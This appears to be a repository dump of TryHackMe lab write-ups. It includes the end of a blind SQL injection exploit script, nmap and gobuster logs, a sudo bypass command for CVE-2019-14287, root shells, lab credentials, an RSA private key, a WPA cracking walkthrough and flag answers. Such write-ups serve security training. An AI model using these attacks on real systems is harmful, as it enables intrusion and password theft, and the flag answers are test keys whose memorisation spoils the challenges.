165 | start_time = time.time()
166 | r = session.get(url)
167 | elapsed_time = time.time() - start_time
168 | if elapsed_time >= TIME:
169 | flag = True
170 | break
171 | if flag:
172 | email = temp_email
173 | ord_email = ord_email_temp
174 | output += '\n[+] Email found: ' + email
175 | flag = True
176 |
177 | dump_salt()
178 | dump_username()
179 | dump_email()
180 | dump_password()
181 |
182 | if options.cracking:
183 | print colored("[*] Now try to crack password")
184 | crack_password()
185 |
186 | beautify_print()
--------------------------------------------------------------------------------
/Simple CTF/exploit.txt:
--------------------------------------------------------------------------------
1 | python exploit.py --url http://10.10.99.100/simple/ --crack --wordlist /usr/share/wordlist/rockyou.txt
--------------------------------------------------------------------------------
/Simple CTF/flag.txt:
--------------------------------------------------------------------------------
1 | W3ll d0n3. You made it!
--------------------------------------------------------------------------------
/Simple CTF/gobuster.txt:
--------------------------------------------------------------------------------
1 | gobuster dir -u http://10.10.99.100/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
2 | ===============================================================
3 | Gobuster v3.0.1
4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
5 | ===============================================================
6 | [+] Url: http://10.10.99.100/
7 | [+] Threads: 10
8 | [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
9 | [+] Status codes: 200,204,301,302,307,401,403
10 | [+] User Agent: gobuster/3.0.1
11 | [+] Timeout: 10s
12 | ===============================================================
13 | 2020/03/21 15:42:52 Starting gobuster
14 | ===============================================================
15 | /simple (Status: 301)
16 | Progress: 15351 / 220561 (6.96%)^C
17 | [!] Keyboard interrupt detected, terminating.
18 | ===============================================================
19 | 2020/03/21 15:48:42 Finished
20 | ===============================================================
--------------------------------------------------------------------------------
/Simple CTF/nmap -p 1000 10.10.99.100.txt:
--------------------------------------------------------------------------------
1 | nmap -p 1000 10.10.99.100
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:26 IST
4 | Nmap scan report for 10.10.99.100
5 | Host is up (0.22s latency).
6 |
7 | PORT STATE SERVICE
8 | 1000/tcp filtered cadlock
--------------------------------------------------------------------------------
/Simple CTF/nmap -p 80 -A -v 10.10.99.100.txt:
--------------------------------------------------------------------------------
1 | nmap -p 80 -A -v 10.10.99.100
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 15:36 IST
4 |
5 | PORT STATE SERVICE VERSION
6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
7 | | http-methods:
8 | | Supported Methods: POST OPTIONS GET HEAD
9 | | http-robots.txt: 2 disallowed entries
10 | |/ /openemr-5_0_1_3
11 | |_http-server-header: Apache/2.4.18 (Ubuntu)
12 | |_http-title: Apache2 Ubuntu Default Page: It works
13 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
14 | Aggressive OS guesses: Linux 3.10 - 3.13 (92%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
15 | No exact OS matches for host (test conditions non-ideal).
16 | Uptime guess: 11.537 days (since Tue Mar 10 02:42:47 2020)
17 | Network Distance: 2 hops
18 | TCP Sequence Prediction: Difficulty=261 (Good luck!)
19 | IP ID Sequence Generation: All zeros
20 |
21 | TRACEROUTE (using port 80/tcp)
22 | HOP RTT ADDRESS
23 | 1 226.68 ms 10.9.0.1
24 | 2 226.99 ms 10.10.99.100
--------------------------------------------------------------------------------
/Simple CTF/robots.txt:
--------------------------------------------------------------------------------
1 | http://10.10.99.100/robots.txt
--------------------------------------------------------------------------------
/Simple CTF/ssh.txt:
--------------------------------------------------------------------------------
1 | ssh -p 2222 mitch@10.10.99.100
2 | The authenticity of host '[10.10.99.100]:2222 ([10.10.99.100]:2222)' can't be established.
3 | ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
4 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
5 | Warning: Permanently added '[10.10.99.100]:2222' (ECDSA) to the list of known hosts.
6 | mitch@10.10.99.100's password:
7 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
8 |
9 | * Documentation: https://help.ubuntu.com/
10 | * Management: https://landscape.canonical.com/
11 | * Support: https://ubuntu.com/advantage
12 |
13 | 0 packages can be updated.
14 | 0 updates are security updates.
15 |
16 | Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
17 | $ ls
18 | user.txt
19 | $ cat user.txt
20 | G00d j0b, keep up!
21 | $ cd ..
22 | $ ls
23 | mitch sunbath
24 | $ sudo -l
25 | User mitch may run the following commands on Machine:
26 | (root) NOPASSWD: /usr/bin/vim
--------------------------------------------------------------------------------
/Sudo Buffer Overflow/README.md:
--------------------------------------------------------------------------------
1 | # Sudo Buffer Overflow | https://tryhackme.com/room/sudovulnsbof
2 |
3 | ### [Task 2] Buffer Overflow
4 |
5 | ssh -p 4444 tryhackme@10.10.164.254 | Password : tryhackme
6 |
7 | ```
8 | ssh -p 4444 tryhackme@10.10.164.254
9 | tryhackme@10.10.164.254's password:
10 | Last login: Thu Jun 18 03:30:09 2020 from 10.9.18.54
11 | tryhackme@sudo-bof:~$ ls
12 | exploit
13 | tryhackme@sudo-bof:~$ ./exploit
14 | [sudo] password for tryhackme:
15 | Sorry, try again.
16 | #
17 | # whoami
18 | root
19 | # id
20 | uid=0(root) gid=0(root) groups=0(root),1000(tryhackme)
21 | # cat /root/root.txt
22 | THM{buff3r_0v3rfl0w_rul3s}
23 | ```
24 |
25 | #2 What's the flag in /root/root.txt? : `THM{buff3r_0v3rfl0w_rul3s}`
26 |
--------------------------------------------------------------------------------
/Sudo Security Bypass/README.md:
--------------------------------------------------------------------------------
1 | # Sudo Security Bypass | https://tryhackme.com/room/sudovulnsbypass
2 |
3 | ### [Task 2] Security Bypass
4 |
5 | ssh -p 2222 tryhackme@10.10.170.166
6 | Password : tryhackme
7 |
8 | What can we run with sudo? : `sudo -l`
9 |
10 | #1 What command are you allowed to run with sudo? : `/bin/bash`
11 |
12 | CVE-2019-14287 : https://nvd.nist.gov/vuln/detail/CVE-2019-14287
13 |
14 | In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
15 |
16 | so, for root access : `sudo -u \#$((0xffffffff)) /bin/bash`
17 |
18 | #2 What is the flag in /root/root.txt? : `THM{l33t_s3cur1ty_bypass}`
--------------------------------------------------------------------------------
/The Find Command/README.md:
--------------------------------------------------------------------------------
1 | # The Find Command | https://tryhackme.com/room/thefindcommand
2 |
3 | ### [Task 2] Be more specific
4 |
5 | #1 Find all files whose name ends with ".xml" : `find / -type f -name "*.xml"`
6 |
7 | #2 Find all files in the /home directory (recursive) whose name is "user.txt" (case insensitive) : `find /home -type f -iname "user.txt"`
8 |
9 | #3 Find all directories whose name contains the word "exploits" : `find / -type d -name "*exploits"`
10 |
11 | ### [Task 3] Know exactly what you're looking for
12 |
13 | #1 Find all files owned by the user "kittycat" : `find / -type f -user kittycat`
14 |
15 | #2 Find all files that are exactly 150 bytes in size : `find / -type f -size 150c`
16 |
17 | #3 Find all files in the /home directory (recursive) with size less than 2 KiB’s and extension ".txt" : `find /home -type f -size -2k -name "*.txt"`
18 |
19 | #4 Find all files that are exactly readable and writeable by the owner, and readable by everyone else (use octal format) : `find / -type f -perm 644`
20 |
21 | #5 Find all files that are only readable by anyone (use octal format) : `find / -type f -perm 444`
22 |
23 | #6 Find all files with write permission for the group "others", regardless of any other permissions, with extension ".sh" (use symbolic format) : `find / -type f -perm go=w -name "*.sh"`
24 |
25 | #7 Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format) : `find /usr/bin -type f -user root -perm /u=s`
26 |
27 | #8 Find all files that were not accessed in the last 10 days with extension ".png" : `find / -type f atime +10 -name "*.png"`
28 |
29 | #9 Find all files in the /usr/bin directory (recursive) that have been modified within the last 2 hours : `find /usr/bin -type f -mmin +120`
--------------------------------------------------------------------------------
/TomGhost/README.md:
--------------------------------------------------------------------------------
1 | TomGhost | https://tryhackme.com/room/tomghost
2 |
3 | [Task 1] Flags
4 |
5 | Are you able to complete the challenge?
6 |
7 | #1 Compromise this machine and obtain user.txt : ```THM{GhostCat_1s_so_cr4sy}```
8 |
9 | #2 Escalate privileges and obtain root.txt : ```THM{Z1P_1S_FAKE}```
10 |
--------------------------------------------------------------------------------
/TomGhost/credential.pgp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/TomGhost/credential.pgp
--------------------------------------------------------------------------------
/TomGhost/creds_merlin:
--------------------------------------------------------------------------------
1 | merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j
2 |
--------------------------------------------------------------------------------
/TomGhost/creds_skyfuck:
--------------------------------------------------------------------------------
1 | skyfuck:8730281lkjlkjdqlksalks
2 |
--------------------------------------------------------------------------------
/TomGhost/flag.txt:
--------------------------------------------------------------------------------
1 | User : THM{GhostCat_1s_so_cr4sy}
2 |
3 | Root : THM{Z1P_1S_FAKE}
4 |
--------------------------------------------------------------------------------
/TomGhost/hash:
--------------------------------------------------------------------------------
1 | tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme 
10 |
11 | 
12 |
13 | 
14 |
--------------------------------------------------------------------------------
/WgelCTF/gobuster_result.txt:
--------------------------------------------------------------------------------
1 | gobuster dir -u 10.10.174.40 -w /usr/share/wordlists/dirb/common.txt
2 | ===============================================================
3 | Gobuster v3.0.1
4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5 | ===============================================================
6 | [+] Url: http://10.10.174.40
7 | [+] Threads: 10
8 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt
9 | [+] Status codes: 200,204,301,302,307,401,403
10 | [+] User Agent: gobuster/3.0.1
11 | [+] Timeout: 10s
12 | ===============================================================
13 | 2020/05/29 02:04:55 Starting gobuster
14 | ===============================================================
15 | /.hta (Status: 403)
16 | /.htaccess (Status: 403)
17 | /.htpasswd (Status: 403)
18 | /index.html (Status: 200)
19 | /server-status (Status: 403)
20 | /sitemap (Status: 301)
21 | ===============================================================
22 | 2020/05/29 02:06:44 Finished
23 | ===============================================================
24 |
--------------------------------------------------------------------------------
/WgelCTF/gobuster_sitemap_result.txt:
--------------------------------------------------------------------------------
1 | gobuster dir -u http://10.10.174.40/sitemap/ -w /usr/share/wordlists/dirb/common.txt
2 | ===============================================================
3 | Gobuster v3.0.1
4 | by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5 | ===============================================================
6 | [+] Url: http://10.10.174.40/sitemap/
7 | [+] Threads: 10
8 | [+] Wordlist: /usr/share/wordlists/dirb/common.txt
9 | [+] Status codes: 200,204,301,302,307,401,403
10 | [+] User Agent: gobuster/3.0.1
11 | [+] Timeout: 10s
12 | ===============================================================
13 | 2020/05/29 02:08:48 Starting gobuster
14 | ===============================================================
15 | /.hta (Status: 403)
16 | /.htaccess (Status: 403)
17 | /.htpasswd (Status: 403)
18 | /.ssh (Status: 301)
19 | /css (Status: 301)
20 | /fonts (Status: 301)
21 | /images (Status: 301)
22 | /index.html (Status: 200)
23 | /js (Status: 301)
24 | ===============================================================
25 | 2020/05/29 02:10:39 Finished
26 | ===============================================================
27 |
--------------------------------------------------------------------------------
/WgelCTF/id_rsa:
--------------------------------------------------------------------------------
1 | -----BEGIN RSA PRIVATE KEY-----
2 | MIIEowIBAAKCAQEA2mujeBv3MEQFCel8yvjgDz066+8Gz0W72HJ5tvG8bj7Lz380
3 | m+JYAquy30lSp5jH/bhcvYLsK+T9zEdzHmjKDtZN2cYgwHw0dDadSXWFf9W2gc3x
4 | W69vjkHLJs+lQi0bEJvqpCZ1rFFSpV0OjVYRxQ4KfAawBsCG6lA7GO7vLZPRiKsP
5 | y4lg2StXQYuZ0cUvx8UkhpgxWy/OO9ceMNondU61kyHafKobJP7Py5QnH7cP/psr
6 | +J5M/fVBoKPcPXa71mA/ZUioimChBPV/i/0za0FzVuJZdnSPtS7LzPjYFqxnm/BH
7 | Wo/Lmln4FLzLb1T31pOoTtTKuUQWxHf7cN8v6QIDAQABAoIBAFZDKpV2HgL+6iqG
8 | /1U+Q2dhXFLv3PWhadXLKEzbXfsAbAfwCjwCgZXUb9mFoNI2Ic4PsPjbqyCO2LmE
9 | AnAhHKQNeUOn3ymGJEU9iJMJigb5xZGwX0FBoUJCs9QJMBBZthWyLlJUKic7GvPa
10 | M7QYKP51VCi1j3GrOd1ygFSRkP6jZpOpM33dG1/ubom7OWDZPDS9AjAOkYuJBobG
11 | SUM+uxh7JJn8uM9J4NvQPkC10RIXFYECwNW+iHsB0CWlcF7CAZAbWLsJgd6TcGTv
12 | 2KBA6YcfGXN0b49CFOBMLBY/dcWpHu+d0KcruHTeTnM7aLdrexpiMJ3XHVQ4QRP2
13 | p3xz9QECgYEA+VXndZU98FT+armRv8iwuCOAmN8p7tD1W9S2evJEA5uTCsDzmsDj
14 | 7pUO8zziTXgeDENrcz1uo0e3bL13MiZeFe9HQNMpVOX+vEaCZd6ZNFbJ4R889D7I
15 | dcXDvkNRbw42ZWx8TawzwXFVhn8Rs9fMwPlbdVh9f9h7papfGN2FoeECgYEA4EIy
16 | GW9eJnl0tzL31TpW2lnJ+KYCRIlucQUnBtQLWdTncUkm+LBS5Z6dGxEcwCrYY1fh
17 | shl66KulTmE3G9nFPKezCwd7jFWmUUK0hX6Sog7VRQZw72cmp7lYb1KRQ9A0Nb97
18 | uhgbVrK/Rm+uACIJ+YD57/ZuwuhnJPirXwdaXwkCgYBMkrxN2TK3f3LPFgST8K+N
19 | LaIN0OOQ622e8TnFkmee8AV9lPp7eWfG2tJHk1gw0IXx4Da8oo466QiFBb74kN3u
20 | QJkSaIdWAnh0G/dqD63fbBP95lkS7cEkokLWSNhWkffUuDeIpy0R6JuKfbXTFKBW
21 | V35mEHIidDqtCyC/gzDKIQKBgDE+d+/b46nBK976oy9AY0gJRW+DTKYuI4FP51T5
22 | hRCRzsyyios7dMiVPtxtsomEHwYZiybnr3SeFGuUr1w/Qq9iB8/ZMckMGbxoUGmr
23 | 9Jj/dtd0ZaI8XWGhMokncVyZwI044ftoRcCQ+a2G4oeG8ffG2ZtW2tWT4OpebIsu
24 | eyq5AoGBANCkOaWnitoMTdWZ5d+WNNCqcztoNppuoMaG7L3smUSBz6k8J4p4yDPb
25 | QNF1fedEOvsguMlpNgvcWVXGINgoOOUSJTxCRQFy/onH6X1T5OAAW6/UXc4S7Vsg
26 | jL8g9yBg4vPB8dHC6JeJpFFE06vxQMFzn6vjEab9GhnpMihrSCod
27 | -----END RSA PRIVATE KEY-----
--------------------------------------------------------------------------------
/WgelCTF/id_rsa.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/id_rsa.png
--------------------------------------------------------------------------------
/WgelCTF/nmap_basic.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Fri May 29 02:03:43 2020 as: nmap -A -oN nmap_basic.nmap 10.10.174.40
2 | Nmap scan report for 10.10.174.40
3 | Host is up (0.22s latency).
4 | Not shown: 998 closed ports
5 | PORT STATE SERVICE VERSION
6 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
7 | | ssh-hostkey:
8 | | 2048 94:96:1b:66:80:1b:76:48:68:2d:14:b5:9a:01:aa:aa (RSA)
9 | | 256 18:f7:10:cc:5f:40:f6:cf:92:f8:69:16:e2:48:f4:38 (ECDSA)
10 | |_ 256 b9:0b:97:2e:45:9b:f3:2a:4b:11:c7:83:10:33:e0:ce (ED25519)
11 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
12 | |_http-server-header: Apache/2.4.18 (Ubuntu)
13 | |_http-title: Apache2 Ubuntu Default Page: It works
14 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
15 | TCP/IP fingerprint:
16 | OS:SCAN(V=7.80%E=4%D=5/29%OT=22%CT=1%CU=41193%PV=Y%DS=2%DC=T%G=Y%TM=5ED0204
17 | OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=105%TI=Z%CI=I%II=I%TS=A)OPS
18 | OS:(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST1
19 | OS:1NW6%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
20 | OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
21 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
22 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
23 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
24 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
25 | OS:=S)
26 |
27 | Network Distance: 2 hops
28 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
29 |
30 | TRACEROUTE (using port 23/tcp)
31 | HOP RTT ADDRESS
32 | 1 295.07 ms 10.9.0.1
33 | 2 295.26 ms 10.10.174.40
34 |
35 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36 | # Nmap done at Fri May 29 02:04:18 2020 -- 1 IP address (1 host up) scanned in 34.53 seconds
37 |
--------------------------------------------------------------------------------
/WgelCTF/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/root.png
--------------------------------------------------------------------------------
/WgelCTF/ssh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/ssh.png
--------------------------------------------------------------------------------
/WgelCTF/ssh2john.txt:
--------------------------------------------------------------------------------
1 | /usr/share/john/ssh2john.py id_rsa
2 | id_rsa has no password!
--------------------------------------------------------------------------------
/WgelCTF/user.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/WgelCTF/user.png
--------------------------------------------------------------------------------
/Wifi Hacking 101/Captures.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Wifi Hacking 101/Captures.tar.gz
--------------------------------------------------------------------------------
/Wifi Hacking 101/README.md:
--------------------------------------------------------------------------------
1 | # Wifi Hacking 101 | https://tryhackme.com/room/wifihacking101
2 |
3 | ### [Task 1] The basics - An Intro to WPA
4 |
5 | Key Terms :
6 |
7 | ● SSID: The network "name" that you see when you try and connect
8 |
9 | ● ESSID: An SSID that *may* apply to multiple access points, eg a company office, normally forming a bigger network. For Aircrack they normally refer to the network you're attacking.
10 |
11 | ● BSSID: An access point MAC (hardware) address
12 |
13 | ● WPA2-PSK: Wifi networks that you connect to by providing a password that's the same for everyone
14 |
15 | ● WPA2-EAP: Wifi networks that you authenticate to by providing a username and password, which is sent to a RADIUS server.
16 |
17 | ● RADIUS: A server for authenticating clients, not just for wifi.
18 |
19 | The core of WPA(2) authentication is the 4 way handshake.
20 |
21 | Most home WiFi networks, and many others, use WPA(2) personal. If you have to log in with a password and it's not WEP, then it's WPA(2) personal. WPA2-EAP uses RADIUS servers to authenticate, so if you have to enter a username and password in order to connect then it's probably that.
22 |
23 | Previously, the WEP (Wired Equivalent Privacy) standard was used. This was shown to be insecure and can be broken by capturing enough packets to guess the key via statistical methods.
24 |
25 | The 4 way handshake allows the client and the AP to both prove that they know they key, without telling each other. WPA and WPA2 use practically the same authentication method, so the attacks on both are the same.
26 |
27 | The keys for WPA are derived from both the ESSID and the password for the network. The ESSID acts somewhat similar to a salt in that it makes dictionary attacks more difficult. It means that for a given password, the key will still vary for each access point. This means that unless you precompute the dictionary for just that accesspoint, you will need to try passwords until you find the correct one.
28 |
29 | Room Banner by Frank Wang on Unsplash
30 |
31 | #1 What type of attack on the encryption can you perform on WPA(2) personal? : `brute force`
32 |
33 | #2 Can this method be used to attack WPA2-EAP handshakes? (Yea/Nay) : `Nay`
34 |
35 | #3 What three letter abbreviation is the technical term for the "wifi code"? : `psk`
36 |
37 | #4 What's the minimum length of a WPA2 Personal password? : `8`
38 |
39 | ### [Task 2] You're being watched - Capturing packets to attack
40 |
41 | Using the Aircrack-ng suite, we can start attacking a wifi network. This will walk you through attacking a network yourself, assuming you have a monitor mode enabled NIC.
42 |
43 | The aircrack-ng suite consists of :
44 |
45 | ● aircrack-ng
46 | ● airdecap-ng
47 | ● airmon-ng
48 | ● aireplay-ng
49 | ● airodump-ng
50 | ● airtun-ng
51 | ● packetforge-ng
52 | ● airbase-ng
53 | ● airdecloak-ng
54 | ● airolib-ng
55 | ● airserv-ng
56 | ● buddy-ng
57 | ● ivstools
58 | ● easside-ng
59 | ● tkiptun-ng
60 | ● wesside-ng
61 |
62 | We'll want to use aircrack-ng, airodump-ng and airmon-ng to attack WPA networks.
63 |
64 | The aircrack tools come by default with Kali, or can be installed with a package manager or from https://www.aircrack-ng.org/
65 |
66 | I suggest creating a hotspot on a phone/tablet, picking a weak password (From rockyou.txt) and following along with every stage. To generate 5 random passwords from rockyou, you can use this command on Kali: `head /usr/share/wordlists/rockyou.txt -n 10000 | shuf -n 5 -`
67 |
68 | You will need a monitor mode NIC in order to capture the 4 way handshake. Many wireless cards support this, but it's important to note that not all of them do.
69 |
70 | Injection mode helps, as you can use it to deauth a client in order to force a reconnect which forces the handshake to occur again. Otherwise, you have to wait for a client to connect normally.
71 |
72 | #1 How do you put the interface “wlan0” into monitor mode with Aircrack tools? (Full command) : `airmon-ng wlan0 start`
73 |
74 | #2 What is the new interface name likely to be after you enable monitor mode? : `wlan0mon`
75 |
76 | #3 What do you do if other processes are currently trying to use that network adapter? : `airmon-ng check kill`
77 |
78 | #4 What tool from the aircrack-ng suite is used to create a capture? : `airodump-ng`
79 |
80 | #5 What flag do you use to set the BSSID to monitor? : `--bssid`
81 |
82 | #6 And to set the channel? : `--channel`
83 |
84 | #7 And how do you tell it to capture packets to a file? : `-w`
85 |
86 | ### [Task 3] Aircrack-ng - Let's Get Cracking
87 |
88 | I will attach a capture for you to practice cracking on. If you are spending more than 3 mins cracking, something is likely wrong. (A single core VM on my laptop took around 1min).
89 |
90 | In order to crack the password, we can either use aircrack itself or create a hashcat file in order to use GPU acceleration. There are two different versions of hashcat output file, most likely you want 3.6+ as that will work with recent versions of hashcat.
91 |
92 | Useful Information :
93 |
94 | BSSID: 02:1A:11:FF:D9:BD
95 |
96 | ESSID: 'James Honor 8'
97 |
98 | #1 What flag do we use to specify a BSSID to attack? : `-b`
99 |
100 | #2 What flag do we use to specify a wordlist? : `-w`
101 |
102 | #3 How do we create a HCCAPX in order to use hashcat to crack the password? : `-j`
103 |
104 | #4 Using the rockyou wordlist, crack the password in the attached capture. What's the password? : `greeneggsandham`
105 |
106 | `aircrack-ng -a2 --bssid 02:1A:11:FF:D9:BD -w /usr/share/wordlists/rockyou.txt NinjaJc01-01.cap`
107 |
108 | #5 Where is password cracking likely to be fastest, CPU or GPU? : `GPU`
109 |
110 |
111 |
--------------------------------------------------------------------------------